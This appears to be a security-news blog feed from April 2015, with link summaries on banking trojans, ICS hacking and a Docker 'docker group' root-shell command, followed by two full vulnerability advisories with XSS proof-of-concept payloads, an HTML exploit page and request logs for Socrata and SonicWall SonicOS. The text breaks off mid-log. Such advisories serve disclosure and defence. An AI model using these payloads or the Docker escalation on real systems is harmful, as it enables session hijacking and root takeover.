Report: Chasing the cybercrime: network insights of Dyre and Dridex Trojan bankers.

April 22, 2015, 12:44 pm

≫ Next: Hacking industrial control systems – Case study: Falcon

≪ Previous: Good Article: Deep dive into QUANTUM INSERT (Includes how to detect this NSA attack with Intrusion Detection Systems like Bro, Snort and Suricata

rojan Bankers are a family of botnets that specialize in stealing information related to the financial sector and user data in order to sell it in underground marketplaces, some of them, also perform wire transfers using these credentials or by taking control of the infected computer.

Due to the difficulties posed by the different security firms, or by the competition that exists between different products, which nourishes it, the malware industry is always evolving and improving its products.

In the current landscape of Banking Trojans, Dyre and Dridex are the most nefarious ones due to the amount of infections that they have racked up since they were discovered, and to the mechanisms that makes them more resilient.

From Blueliv, we launched an intensive investigation to find out how these botnets operate, we were able to analyze the networking protocol for both Dyre and Dridex, and to infiltrate the botnet, gathering a lot of information about how they operate, and who do they target.

more here.......https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf

↧

Hacking industrial control systems – Case study: Falcon

April 22, 2015, 4:09 pm

≫ Next: MS15-035 EMF file handling vulnerability analysis and POC structure

≪ Previous: Report: Chasing the cybercrime: network insights of Dyre and Dridex Trojan bankers.

Exploiting the Honeywell Falcon

This post picks up where the earlier posts, CVE-2014-2717: Attacking the Honeywell Falcon XLWeb (30.09.2014) and Cross Site Scripting – Attacking the Honeywell Falcon XLWeb part two (02.10.2014) left of.

In the following blog post, we will be moving from gaining application level administrative control and how to use XSS, to target system administrators, and finally, how to gain a shell on the operating system level of the equipment using a combination of misconfigurations and security issues in combination.

more here........https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/

↧

MS15-035 EMF file handling vulnerability analysis and POC structure

April 22, 2015, 4:16 pm

≫ Next: AppCompatCache changes in Windows 10

≪ Previous: Hacking industrial control systems – Case study: Falcon

MS15-035 is Microsoft Graphics component vulnerability. Analysis here.......http://drops.wooyun.org/papers/5731

This is in Chinese so you know what to do if you can't speak the language

↧

AppCompatCache changes in Windows 10

April 22, 2015, 4:19 pm

≫ Next: Privilege Escalation via Docker

≪ Previous: MS15-035 EMF file handling vulnerability analysis and POC structure

The AppCompatCache value lives at SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache.

In Windows 7, 8.0, and 8.1, the header is 128 bytes in size

I recently added AppCompatCache support to my live response tool and when I tested it on Windows 10, I didn't get any shimcache entries.

more here......http://binaryforay.blogspot.com/2015/04/appcompatcache-changes-in-windows-10.html

↧

Privilege Escalation via Docker

April 22, 2015, 4:26 pm

≫ Next: Analyzing the Magento Vulnerability

≪ Previous: AppCompatCache changes in Windows 10

TLDR; Don’t use the ‘docker’ group

Docker, if you aren’t already familiar with it, is a lightweight runtime and packaging tool. It’s very similar to simply running a basic virtual machine, but with much less overhead. It’s extremely nice for deploying applications as you can guarantee that they will run in identical environments, and the commit-like image system is handy as well.

If you happen to have gotten access to a user-account on a machine, and that user is a member of the ‘docker’ group, running the following command will give you a root shell:

> docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

more here.......https://fosterelli.co/privilege-escalation-via-docker.html

↧

Analyzing the Magento Vulnerability

April 23, 2015, 12:18 am

≫ Next: Creating Burp extensions in Python, the "editor" case

≪ Previous: Privilege Escalation via Docker

Check Point researchers recently discovered a critical RCE (remote code execution) vulnerability in the Magento web e-commerce platform that can lead to the complete compromise of any Magento-based store, including credit card information as well as other financial and personal data, affecting nearly two hundred thousand online shops.

more here...............http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/

↧

Creating Burp extensions in Python, the "editor" case

April 23, 2015, 12:19 am

≫ Next: mplementing Secure User Authentication in PHP Applications with Long-Term Persistence

≪ Previous: Analyzing the Magento Vulnerability

Surely you've heard of the Burp Suite, quite useful software to perform security testing of web applications and in general to play with anything that talks HTTP(S). There's even a free edition which is often more than enough since I mostly use just Proxy and Repeater.

You can even write extensions to automate things or support some weird things you might see on top of HTTP. Burp being written in Java, you can write your extensions in Java. They also allow you to write them in Python or Ruby, using Jython or JRuby.

I needed to write an extension recently, in Python since I don't particularly like Java. This post shares my experience and resulting code........http://blog.stalkr.net/2015/04/creating-burp-extensions-in-python.html

↧

mplementing Secure User Authentication in PHP Applications with Long-Term Persistence

April 23, 2015, 1:05 am

≫ Next: Socrata Bug Bounty #1 - Persistent Encoding Vulnerability

≪ Previous: Creating Burp extensions in Python, the "editor" case

A common problem in web development is to implement user authentication and access controls, typically accomplished through sign-up and log-in forms. Though these systems are simple enough in theory, engineering one that lives up to application security standards is a daunting undertaking.

Without a great deal of care and sophistication, authentication systems can be as fragile as a cardboard lemonade stand in a category five hurricane. However, for everything that can go wrong, there is an effective (and often simple) way to achieve a higher level of security and resilience.

more here.........https://paragonie.com/blog/2015/04/secure-authentication-php-with-long-term-persistence

↧

Socrata Bug Bounty #1 - Persistent Encoding Vulnerability

April 23, 2015, 2:59 am

≫ Next: SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability

≪ Previous: mplementing Secure User Authentication in PHP Applications with Long-Term Persistence

Document Title:
===============
Socrata Bug Bounty #1 - Persistent Encoding Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1438

Release Date:
=============
2015-04-22

Vulnerability Laboratory ID (VL-ID):
====================================
1438

Common Vulnerability Scoring System:
====================================
3.3

Product & Service Introduction:
===============================
Private Socrata Bug Bounty Program - BC

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation vulnerability in the Socrata online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-02-24: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-02-24: Vendor Notification (Socrata Security Team - Silent Bug Bounty Program)
2015-02-24: Vendor Response/Feedback (Socrata Security Team - Silent Bug Bounty Program)
2015-02-24: Vendor Fix/Patch (Socrata Developer Team)
2015-02-25: Bug Bounty Reward (Socrata Security Team - Silent Bug Bounty Program)
2015-04-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Socrata Inc
Product: Socrata Online Service - Web Application 2015 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side mail encoding web vulnerability has been discovered in the official Socrata online service web-application.
The vulnerability allows remote attackers to bypass the outgoing mail filter validation of the socrata web-server & web-application.

The vulnerability is located in the first- and lastname values of the `leadCapture/save` module. Remote attackers without privileged application
user account are able to inject persistent malicious script codes. The script code execution occurs in the notification mail to the service but
also to the active user copy mail. The persistent injected script code executes in the header section were the database context of the first- and
lastname will be displayed. The sender interacts automatically by usage of the discover.socrata.com service. The validation of the db stored outgoing
values is wrong encoded and allows persistent injections of malicious script codes via POST method. The attack vector is persistent and the request
method to inject is POST.

The security risk of the mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the web vulnerability requires no privileged web-application user account and low or medium user interaction because of the
persistent attack vector. Successful exploitation of the encoding vulnerability results in session hijacking, persistent phishing, persistent
external redirects and persistent manipulation of web header or mail body context.

Vulnerable Domain(s):
[+] discover.socrata.com

Vulnerable Module(s):
[+] index.php/leadCapture/save

Vulnerable Parameter(s):
[+] firstname
[+] lastname

Affected Sender(s):
[+] sales@socrata.com

Affected Receiver(s):
[+] bkm@evolution-sec.com

Affected Context Module(s):
[+] Service Notification Mail (Users)

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Surf to the vulnerable service page
2. Inject payload to the firstname and lastname values
3. Save the content
4. View your mailbox to review the malicious mail
5 Successful reproduce of the security vulnerability!

PoC: Thank You for Downloading "The 2014 Benchmark Report"

<tbody><tr><td valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody>
<tr><td style="font-family:Helvecita, Arial,sans-serif; font-size:26px; line-height:30px; color:#2f2b26;
padding:35px 20px 35px 20px; " align="center" valign="top"><div id="TopHeadline" class="mktEditable">2014 Open Data Benchmark Report</div>
</td>
</tr>
<tr><td colspan="2" align="left" valign="top"><div class="headerDefault"><div id="Header" class="mktEditable"></div>
</div>
</td>
</tr>
</tbody></table>
</td>
</tr>
<tr><td style="padding:25px 25px 50px 25px; "><table class="column1" style="background:#fff; " align="left" border="0" cellpadding="0"
cellspacing="0"><tbody><tr><td style="font-family:Helvetica,Arial,sans-serif; color:#928e8b; font-size:16px; line-height:20px;
padding-bottom:25px; " valign="top"><div id="SubHeadline" class="mktEditable">Read the Full Report</div>
</td>
</tr>
<tr><td style="font-family:Helvetica,Arial,sans-serif; color:#555555; font-size:12px; line-height:17px; " valign="top"><div id="Body"
class="mktEditable"><p style="margin-top: 0;">Hello ">[PERSISTENT INJECTED SCRIPT CODE HERE!]<iframe src="http://www.evolution-sec.com/peng.js" onload="alert(document.cookie),</p">
<p><span><p>Thank you for your interest in Socrata. You can download the 2014 Open Data Benchmark Study at any time by clicking the Download Now button below.</p>
<p>An effective digital portal is the foundation of improving efficiency with open data. Learn how the <a href=
"http://info.socrata.com/P000y0zS9I1GB80m0SpI193" target="_blank"
>Socrata Open Data Portal</a> can help you streamline data publishing as well as enable others to search, query, and visualize your data with ease.</p></span></p>
<p>Sincerely,<br /> The Socrata Team </p></div>
<table border="0" cellspacing="0" cellpadding="0" width="130" ><tr ><td valign="top" style="line-height:38px;">
<img src="http://discover.socrata.com/rs/socrata/images/SOC-2001-EmailTemplate_button-bg-left.png" width="4" height="38" style="display:block;"></td>
<td valign="middle" align="center" width="122" style="background:#3688c7; font-family:Arial,sans-serif; font-size:11px; " id="cta" >
<div class="mktEditable" id="ctabutton" ><a style="color: #fff; text-decoration: none;" href="http://info.socrata.com/dc/etTJjiR4FWljikJd-Q32ft94T9WmU3brfUe91EtPV5Ni0xg-
fugbOrtKryWragOmEUOmuznx6oKiB7-ZI_vvTlWvpJxF-ZMxGVvTpDTBBgewMyZQls7ugS6M1FrTI_N_/DSz801n0IIS00m019y3G0z9">Download Now</a></div>
</td>
<td valign="top" style="line-height:38px;"><img src="http://discover.socrata.com/rs/socrata/images/SOC-2001-EmailTemplate_button-bg-right.png" width="4" height="38" style="display:block;"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>

--- PoC Session Logs [POST] (Injection) ---
18:22:52.246[607ms][total 607ms] Status: 200[OK]
POST http://discover.socrata.com/index.php/leadCapture/save2 Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[162] Mime Type[application/json]
Request Header:
Host[discover.socrata.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://discover.socrata.com/2014-open-data-benchmark-report.html?utm_source=website&utm_medium=organic&utm_content=benchmark-ctas&utm_campaign=2014-benchmark-report]
Content-Length[1547]
Cookie[_ga=GA1.2.1116345037.1424797254; _mkto_trk=id:851-SII-641&token:_mch-socrata.com-1424797253790-11625; BIGipServerabkweb_app_http=805830922.20480.0000; _ga=GA1.3.1116345037.1424797254; __ar_v4=VEJ5FE467RDKVEKTJM4OBA%3A20150226%3A4%7CYVZAENVZKNFATNFDNV7HDD%3A20150226%3A6%7CBASXJGCN7FCI5NFI65M4R7%3A20150226%3A6%7CZV6R5RYQUZFC7NTFHALGCQ%3A20150226%3A2; _bizo_bzid=2dccc537-d055-4ced-8648-cc5eff5e5db6; _bizo_cksm=2A2F66AADC1BB497; _bizo_np_stats=14%3D75%2C; __csess=1424799445047.9ZTM9L.; _gat_UA-9046230-4=1; __cdrop=.7YI4DD.]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
FirstName[%22%3E%3Ciframe%20src%3Da%20onload%3Dalert(%22PENTEST%22)]
LastName[%22%3E%3Ciframe%20src%3Da%20onload%3Dalert(%22PENTEST%22)%20%3C]
Email[bkm%40evolution-sec.com]
Company[sap%20epi]
Title[pentester%2023%20ONE]
testtest__c[]
Opt_in_Checkbox__c[Yes]
UTM_Term__c[]
UTM_Source__c[website]
UTM_Medium__c[organic]
UTM_Content__c[benchmark-ctas]
UTM_Campaign__c[2014-benchmark-report]
RF_HQ_Company_Name__c[]
RF_MS_Address1__c[]
RF_MS_Address2__c[]
RF_MS_Annual_Revenue__c[]
RF_MS_City__c[]
RF_MS_Company_Name__c[]
RF_MS_Confidence_Level__c[not%20found]
RF_MS_Employee_Location_Count__c[]
RF_MS_Employee_Total_Count__c[]
RF_MS_Inferred_Area_Code__c[]
RF_MS_Inferred_City__c[Heidelberg]
RF_MS_Inferred_Country__c[Germany]
RF_MS_Inferred_State__c[Baden-Wurttemberg]
RF_MS_Location_Type__c[]
RF_MS_NAICS_Name__c[]
RF_MS_NAIC_Code__c[]
RF_MS_Phone__c[]
RF_MS_SIC__c[]
RF_MS_SIC_Code__c[]
RF_MS_SIC_Name__c[]
RF_MS_State_Code__c[]
RF_MS_State_Name__c[]
RF_MS_Subsidiary_Code__c[]
RF_MS_Trade_Name__c[]
RF_MS_URL__c[]
RF_MS_postal_Code__c[]
Qualification_PM_Highest_Priorities__c[Public%20Safety]
formid[1968]
lpId[4775]
subId[147]
munchkinId[851-SII-641]
lpurl[http%3A%2F%2Fdiscover.socrata.com%2F2014-Open-Data-Benchmark-Report_Landing-Page-B.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
cr[]
kw[]
q[]
_mkt_trk[id%3A851-SII-641%26token%3A_mch-socrata.com-1424797253790-11625]
formVid[1968]
_mktoReferrer[http%3A%2F%2Fdiscover.socrata.com%2F2014-open-data-benchmark-report.html%3Futm_source%3Dwebsite%26utm_medium%3Dorganic%26utm_content%3Dbenchmark-ctas%26utm_campaign%3D2014-benchmark-report]
Response Header:
Server[nginx]
Date[Tue, 24 Feb 2015 17:22:57 GMT]
Content-Type[application/json; charset=utf-8]
Content-Length[162]
Connection[keep-alive]
Access-Control-Allow-Origin[*]
Vary[Accept-Encoding]
Content-Encoding[gzip]
-
18:22:52.871[1070ms][total 1332ms] Status: 200[OK]
GET http://discover.socrata.com/2014-benchmark-report-email-thank-you.html?aliId=5515772 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6524] Mime Type[text/html]
Request Header:
Host[discover.socrata.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://discover.socrata.com/2014-open-data-benchmark-report.html?utm_source=website&utm_medium=organic&utm_content=benchmark-ctas&utm_campaign=2014-benchmark-report]
Cookie[_ga=GA1.2.1116345037.1424797254; _mkto_trk=id:851-SII-641&token:_mch-socrata.com-1424797253790-11625; BIGipServerabkweb_app_http=805830922.20480.0000; _ga=GA1.3.1116345037.1424797254; __ar_v4=VEJ5FE467RDKVEKTJM4OBA%3A20150226%3A4%7CYVZAENVZKNFATNFDNV7HDD%3A20150226%3A6%7CBASXJGCN7FCI5NFI65M4R7%3A20150226%3A6%7CZV6R5RYQUZFC7NTFHALGCQ%3A20150226%3A2; _bizo_bzid=2dccc537-d055-4ced-8648-cc5eff5e5db6; _bizo_cksm=2A2F66AADC1BB497; _bizo_np_stats=14%3D75%2C; __csess=1424799445047.9ZTM9L.; _gat_UA-9046230-4=1; __cdrop=.7YI4DD.]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Tue, 24 Feb 2015 17:22:58 GMT]
Content-Type[text/html; charset=utf-8]
Content-Length[6524]
Connection[keep-alive]
p3p[CP="CAO CURa ADMa DEVa TAIa OUR IND UNI COM NAV INT"]
Vary[*,Accept-Encoding]
Content-Encoding[gzip]

Reference(s):
http://discover.socrata.com/index.php/leadCapture/save2
http://discover.socrata.com/2014-benchmark-report-email-thank-you.html?aliId=5515772
http://discover.socrata.com/2014-open-data-benchmark-report.html?utm_source=website&utm_medium=organic&utm_content=benchmark-ctas&utm_campaign=2014-benchmark-report

Solution - Fix & Patch:
=======================
Encode and Parse the firstname and lastname values in the contact formular. Restrict the input to disallow injection of special chars or script codes.
Parse the outgoing contact of mails with user values to prevent persistent script code execution in mail body with user values.

Security Risk:
==============
The security risk of the application-side mail encodeing web vulnerability is estimated as medium. (CVSS 3.3)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:   www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:   admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:   magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:   vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

↧

SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability

April 23, 2015, 3:59 am

≫ Next: SevDesk v1.1 iOS - Persistent Dashboard Vulnerability

≪ Previous: Socrata Bug Bounty #1 - Persistent Encoding Vulnerability

Document Title:
===============
SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1359


Release Date:
=============
2015-04-23


Vulnerability Laboratory ID (VL-ID):
====================================
1359


Common Vulnerability Scoring System:
====================================
3


Product & Service Introduction:
===============================
The proven SonicOS architecture is at the core of every Dell™ SonicWALL™ firewall from the SuperMassive™ E10800 to the TZ 100. 
SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver 
application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN) 
technology and other robust security features.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Network-Security-Platform.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a cross site vulnerability in the official SonicWall SonicOS v6.x and v7.5.0.12.


Vulnerability Disclosure Timeline:
==================================
2015-04-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
DELL
Product: Sonicwall SonicOS 7.5.0.12 & v6.x


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple client-side cross site scripting web vulnerabilities has been discovered in the official SonicWall SonicOS v6.x and v7.5.0.12.
The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise session information.

The vulnerability is located in the `searchSpoof and searchSpoofIpDet` values of the `Network > MAC-IP Anti-spoof` module. Remote attackers are able to 
inject malicious script codes to client-side application requests. Remote attackers are able to prepare special crafted weblinks to execute client-side 
script code that compromises the sonicos application user/admin session data. The execution of the script code occurs in the mac-ip anti spoof module.
The attack vector of the vulnerability is located on the client-side of the online-service and the request method to inject or execute the code is GET.

The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load 
of malicious script codes or non-persistent web module context manipulation.

Request Method(s):
    [+] GET

Vulnerable Module(s):
    [+] Network > MAC-IP Anti-spoof

Vulnerable File(s):
    [+] macIpSpoofView.html

Vulnerable Parameter(s):
    [+] searchSpoof
    [+] searchSpoofIpDet


During the client security tests the research team noticed that the official vm version and the all appliance models are affected by the security issue. 
The following versions and models of the sonicwall appliance web-application are affected by the remote cross site scripting vulnerability.

Affected Model(s):
    [+] (CASS) Anti Spam - UTM Integrated Anti-Spam
    [+] (CASS) Anti Spam - Enhanced Comprehensive Anti-spam
    [+] (CASS) Anti Spam - Email Security

Affected Version(s):
    [+] SonicOS v7.5.0.12
    [+] SonicOS v6.x


Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability can be exploited by remote attackers without privileged application user account and 
with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information 
and steps below to continue.


PoC: Payload(s)
https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Ciframe%20src=http://www.vulnerability-lab.com onload=alert("PENTEST")%20<&searchSpoofIpDet=[x]

https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=[x]
&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20 


PoC: Exploit

<html>
<head><body>
<title>Sonicwall AntiSpam "SonicOS Enhanced 5.9.0.7" - (searchSpoof & searchSpoofIpDet) Cross Site Scripting PoC</title>
<iframe src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Ciframe src=http://www.vulnerability-lab.com onload=alert("PENTEST")%20<&searchSpoofIpDet=[x]>
<br>
<img src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=[x]
&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20>
<br>
<iframe src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Cimg src=http://www.vulnerability-lab.com/files/ptest.png onload=alert(document.cookie)%20<&searchSpoofIpDet=%22%3E%3Cimg 
src=http://www.vulnerability-lab.com/files/ptest.png onload=alert(document.cookie)%20<
</body></head>
</html>

Note: Exploiting a Cross Site Scripting Vulnerability in the searchSpoof value of the macIpSpoofView.html file.



PoC: Vulnerable Source

<td class="listLabel" align="left" nowrap="" width="15%">
<span class="objItemSpacing">
<input title="" name="capCbox" onclick="checkAllSpoofIp(this);" onfocus="if (this.disabled) { this.blur(); }" type="checkbox">
</span>
<span class="listLabel" align="left" nowrap="">
<script type="text/JavaScript">
<!--
      setSpoofIpColHead(1, 'IP Address');
     // -->
</script><a class="tableLink" href="/macIpSpoofView.html?tableSortCol=1&tableSortInverted=0&
searchSpoof="><[CLIENT-SIDE SCRIPT CODE EXECUTION!];)" &searchspoofipdet="&startItem=0&startItemIpDet=0"">IP Address</a>
</span>
</td>
<td class="listLabel" align="left" width="10%" nowrap>
<script type="text/JavaScript">
<!--
     setSpoofIpColHead(2, 'Type');
    // -->
</script>
</td>
<td class="listLabel" align="left" width="10%" nowrap>
<script type="text/JavaScript">
<!--
     setSpoofIpColHead(3, 'Interface');
    // -->
</script>
</td>
<td class="listLabel" align="left" width="15%" nowrap>
<script type="text/JavaScript">
<!--
     setSpoofIpColHead(4, 'MAC Address');
    // -->
</script>
</td>
<td class="listLabel" align="left" width="20%" nowrap>
<script type="text/JavaScript">
<!--
     setSpoofIpColHead(5, 'Host Name');
    // -->
</script>



--- PoC Session Logs [GET] ---
Status: 200[OK] 

GET https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3C[CLIENT-SIDE SCRIPT CODE INJECTION!]&searchSpoofIpDet= Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[cas.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cas.127.0.0.1:8080/macIpSpoofView.html]
      Cookie[__utma=227649090.564465250.1416863624.1416863624.1416865480.2; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html; charset=UTF-8;]



-
Status: 200[OK] 

GET https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[cass240.demo.sonicwall.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cass240.demo.sonicwall.com/macIpSpoofView.html]
      Cookie[__utma=227649090.564465250.1416863624.1416865480.1417100584.3; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; 